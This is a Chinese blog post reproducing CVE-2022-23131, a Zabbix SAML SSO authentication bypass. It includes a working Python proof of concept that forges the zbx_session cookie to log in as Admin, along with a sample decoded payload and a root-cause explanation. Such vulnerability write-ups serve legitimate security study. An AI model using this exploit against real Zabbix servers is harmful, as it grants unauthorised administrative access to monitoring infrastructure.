Zabbix-CVE-2022-23131复现

最新推荐文章于 2024-06-18 16:01:59 发布
最新推荐文章于 2024-06-18 16:01:59 发布
阅读量2k 收藏
点赞数
分类专栏: 安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45794666/article/details/123106641
版权

Zabbix-CVE-2022-23131

0x01漏洞介绍

Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。

Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。

攻击条件限制:

  • 需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认禁用的访客帐户)。
  • 但因Zabbix的Web前端自动配置了一个名为Admin的高权限用户,所以漏洞利用相对而言难度降低了。

影响版本:

  • 5.4.0 - 5.4.8
  • 6.0.0 - 6.0.0beta1

0x02漏洞复测

利用poc获取session,然后将cookie替换为获取到的session,之后点击Sign in with Single Sign-On (SAML),即可实现未授权访问。

https://github.com/L0ading-x/cve-2022-23131

获取session

在这里插入图片描述

替换zbx_session

点击登录,成功未授权进入后台

在这里插入图片描述

0x03POC分析

import requests
import re
import urllib.parse
import base64
import json
import sys
 
def exp(target, username):
	resp = requests.get(url=target, verify=False)
	cookie = resp.headers.get("Set-Cookie")

	zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)

	url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')
	base64_decode_data = base64.b64decode(url_decode_data)

	decode_to_str = str(base64_decode_data, encoding='utf-8')

	to_json = json.loads(decode_to_str)

	tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])

	payloadJson = json.dumps(tmp_ojb)
	print("decode_payload:", payloadJson)

	payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
	print("zbx_signed_session:", payload)


if __name__ == "__main__":
	if len(sys.argv) != 3:
		print("argv error")
		exit(0)
	target = sys.argv[1]
	username = sys.argv[2]

	exp(target, username)

非常的简单,首先对目标进行一次请求获取到请求头中的set-cookie

再用正则匹配出zbx_session的值,url解码后再base64解码然后转json

手动解码或者直接print打印即可知道json格式

decode_payload: {"saml_data": {"username_attribute": "Admin"}, "sessionid": "c7605481cdd0aaaa1e5c65b91851b55c", "sign": "SiSFwbllzSuv+CBeHiQ5fpswmR1KOpAMreltIYVJqlrGxAWOS2Vt6bgeHhz5NpoX+byr17K13wvJV21a0KpBpA=="}

在去构造saml的json请求,只替换了saml_data中的username_attribute参数为存在的用户名(这里是Admin)

然后重新json转码之后base64加密再url编码重新得到payload

后记

安装环境太过繁琐,所以没有审计复现。

简单看了下,是由于检查函数只验证了sessionid,而启用 SAML 身份验证时直接提取了saml_data中的username_attribute来提取用户信息进行登录然后赋值给session

无关于sessionid,而saml_data又没有进行加密等处理,所以导致了身份认证的绕过

6ri9ht
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
weblogic10.36 CVE-2018-2893补丁文件
08-02
weblogic10.36 CVE-2018-2893补丁文件 最新补丁文件,修复 WebLogic(CVE-2018-2893)安全漏洞预警,oracle官方发布了2018年4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),因该漏洞修补不善导致被绕过。2018年7月14日,Oracle 官方给该绕过漏洞分配了CVE编号CVE-2018-2893。 通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以实现远程代码执行获取目标服务器的权限。
zabbix-agent.tar.gz
07-28
Zabbix-Agent是一款强大的开源监控软件,它在IT基础设施管理领域占据着重要地位。"zabbix-agent.tar.gz" 是Zabbix Agent的压缩包文件,通常用于在目标系统上部署该代理服务。这个特定的版本被描述为一个修改后的采集...
zabbix SAML SSO 登录绕过漏洞(CVE-2022-23131
xiaobai_20190815的博客
03-09 267
CVE-2022-23131
Zabbix登录绕过漏洞复现(CVE-2022-23131)
MrHatSec的博客
04-06 6104
Zabbix登录绕过漏洞复现(CVE-2022-23131)
未授权访问漏洞总结
最新发布
m0_64481831的博客
06-18 1038
以下总结了常见的未授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
漏洞复现模块
m0_58033230的博客
08-22 1793
GlassFish任意文件读取
第21篇:判断Weblogic详细版本号的方法总结
ABC_123的博客
09-04 5727
Part1 前言在日常的渗透测试、红队评估项目中,中间件层面的漏洞挖掘是非常重要一环,Weblogic中间件在最近几年接连被爆出很多高危漏洞,基本上都是可以直接拿到权限的。主流的Weblogic漏洞包括HTTP协议上的CVE-2017-10271、CVE-2019-2729等,但是其影响weblogic的版本为12.1.3之前版本。如果能事先判断出weblogic的版本号是大于12.1.3的,...
无胁科技-TVD每日漏洞情报-2022-6-22
wuthreat无胁科技的博客
06-22 408
漏洞名称:Spring Data MongoDB SpEL表达式注入漏洞 漏洞级别:高危 漏洞编号:CVE-2022-22980 相关涉及:Spring Data MongoDB 漏洞状态:POC 参考链接:https://tvd.wuthreat.com/#/listDetail?TVD_ID=TVD-2022-12692漏洞名称:SAP Focused Run 缺乏身份验证检查漏洞 漏洞级别:高危 漏洞编号:CVE-2022-24396 相关涉及:SAP Focused Run 漏洞状态:未定义 参考链
zabbix-template-converter:在版本之间迁移Zabbix模板
02-04
`zabbix-template-converter`就是为了解决这个问题而诞生的一个工具,它能够帮助用户方便地在不同的Zabbix版本之间转换模板。 `zabbix-template-converter`是一个用Python编写的脚本,适用于那些需要在Zabbix 2.x、...
zabbix-agent-4.0.30-1.el7.x86_64.zip
01-13
zabbix-agent-4.0.30-1.el7.x86_64.zip zabbix-agent-4.0.30-1.el7.x86_64.zip zabbix-agent-4.0.30-1.el7.x86_64.zip
alexanderzobnin-zabbix-app-4.2.5.zip
03-01
grafana-cli --pluginUrl ...grafana-cli install zabbix-plugin_linux_amd64 https://storage.googleapis.com/plugins-community/alexanderzobnin-zabbix-app/release/4.2.5/alexanderzobnin-zabbix-app-4.2.5.zip
zabbix简介
lixinkuan的博客
08-14 2376
一、概述 zabbix([`zæbiks]由 Alexei Vladishev 创建,目前由 Zabbix SIA 积极开发和支持。 Zabbix 是企业级开源分布式监控解决方案。 Zabbix 是免费的。Zabbix 是在GPL通用公共许可证第 2 版下编写和分发的。这意味着它的源代码是免费分发的,可供公众使用。 zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 .
Zabbix 6.0 介绍及部署
weixin_60917414的博客
07-06 1179
Zabbix 是由 Alexei Vladishev 创建,目前是由 Zabbix SIA 在持续开发和提供支持。zabbix是一个基于Web界面的提供了分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。zabbix 由 2 部分构成,zabbix server 与可选组件 zabbix agent。通过 C/S 模式采集数据,通过 B/S 模式在 Web 端展示和配置。
开发知识点-Weblogic
aming小老弟
12-27 1349
2、升级官方安装补丁:https://www.oracle.com/security-alerts/cpujan2021.html。调试分析参考:https://mp.weixin.qq.com/s/WtoUzPEgLlU8jUzvzC75Dg。漏洞分析见:https://mp.weixin.qq.com/s/wX9TMXl1KVWwB_k6EZOklw。访问 http://www.jackson-t.ca/runtime-exec-payloads.html,
zabbix监控平台部署(一)
2301_78534660的博客
09-01 345
提示:这里对文章进行总结:例如:以上就是今天要讲的内容,本文仅仅简单介绍了pandas的使用,而pandas提供了大量能使我们快速便捷地处理数据的函数和方法。
CVE-2022-23131漏洞复测
weixin_42618425的博客
02-23 9628
CVE-2022-23131漏洞复测 1、漏洞介绍 Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。 Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。 2、漏洞复测 利
Zabbix监控服务详解+实战
weixin_49561506的博客
01-10 6074
本篇博客介绍了Zabbix监控服务,包括基本功能、工作原理、以及Zabbix的部署,最后使用Zabbix监控进行实战操作。
dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent
05-29
这个命令是用来安装 Zabbix Server、Zabbix Web、Nginx 配置文件、Zabbix SQL 脚本、SELinux 策略和 Zabbix Agent。这些组件都是 Zabbix 监控系统所必需的。 如果您已经安装了 Zabbix Server 和 MySQL,您可以使用此命令安装其他必需的组件。安装命令如下: ``` dnf install zabbix-server-mysql zabbix-web-mysql zabbix-nginx-conf zabbix-sql-scripts zabbix-selinux-policy zabbix-agent ``` 安装完成后,您需要按照 Zabbix 官方文档中的说明来配置 Zabbix Server 和 Zabbix Web。其中包括创建 Zabbix 数据库、导入 SQL 脚本、编辑 Zabbix Server 配置文件等步骤。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值